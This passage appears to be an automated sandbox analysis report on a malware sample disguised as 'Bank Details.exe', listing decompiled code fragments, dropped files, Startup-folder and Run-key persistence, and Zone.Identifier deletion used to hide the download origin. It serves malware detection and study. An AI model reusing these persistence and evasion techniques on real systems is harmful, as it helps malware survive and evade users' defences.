                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Locate to index partition.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write VOL1Label.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfslabel.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfsindex.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDA7CB push edx; retf 0_2_07CDA7D2
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDACB1 push esp; retf 0_2_07CDACB2
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDC3B0 pushad ; retf 0_2_07CDC3B2
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDC3B3 pushad ; retf 0_2_07CDC3BA
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDC359 pushad ; retf 0_2_07CDC35A
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDB358 push esi; retf 0_2_07CDB35A
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDC35B pushad ; retf 0_2_07CDC362
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDA363 push eax; retf 0_2_07CDA366
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDB30D push esi; retf 0_2_07CDB332
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDC2BC pushad ; retf 0_2_07CDC2BE
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDC2BF pushad ; retf 0_2_07CDC2C2
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDA1D6 push ecx; retf EFCDh0_2_07CDA32A
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDB193 push ebp; retf 0_2_07CDB19A
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07D40393 push FFFFFFE9h; retn 0001h0_2_07D4039D
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07D48B21 pushfd ; retf 0_2_07D48B22
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07D46E09 push ecx; retf 0046h0_2_07D46E2A
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07D490D4 pushad ; retf 0_2_07D4912D
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07D40492 push FFFFFFE9h; ret 0_2_07D4049C
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_08175AA0 push ss; ret 0_2_08179526
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_08179829 pushfd ; retf 0046h0_2_0817982A
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_08179464 push ss; ret 0_2_08179526
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_0817A4A8 push eax; retf 0_2_0817A4A9
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_0817A543 pushad ; retf 0_2_0817A545
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_08170BB0 push eax; iretd 0_2_08170C06
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_081797A7 pushad ; retf 0_2_081797AD
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_081797FC pushfd ; retf 0046h0_2_08179822
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_086AD570 push cs; retf 0_2_086ADE7A
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_086AFDF1 push ds; retf 0_2_086AFDF2
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_086ADE7B push cs; retf 0_2_086ADE82
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_086AF17B push ss; retf 0_2_086AF182
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_086AE408 push FFFFFF8Bh; iretd 0_2_086AE40A
                      Source: Bank Details.exe, y8.csHigh entropy of concatenated method names: 'Ad80Bt', 'Mo13Sk', 'Hg0e9G', 'Zf9g4X', 'g2DWi0', 'a0C8Bs', 'Eg7w6S', 'Ld5n8D', 'd1TDq9', 'Yp7m6A'
                      Source: udo.exe.8.dr, y8.csHigh entropy of concatenated method names: 'Ad80Bt', 'Mo13Sk', 'Hg0e9G', 'Zf9g4X', 'g2DWi0', 'a0C8Bs', 'Eg7w6S', 'Ld5n8D', 'd1TDq9', 'Yp7m6A'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\udo.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Bank Details.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\udo.lnkJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\udo.lnkJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXvJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXvJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\Bank Details.exeFile opened: C:\Users\user\Desktop\Bank Details.exe\:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeFile opened: C:\Users\user\Desktop\udo.exe\:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
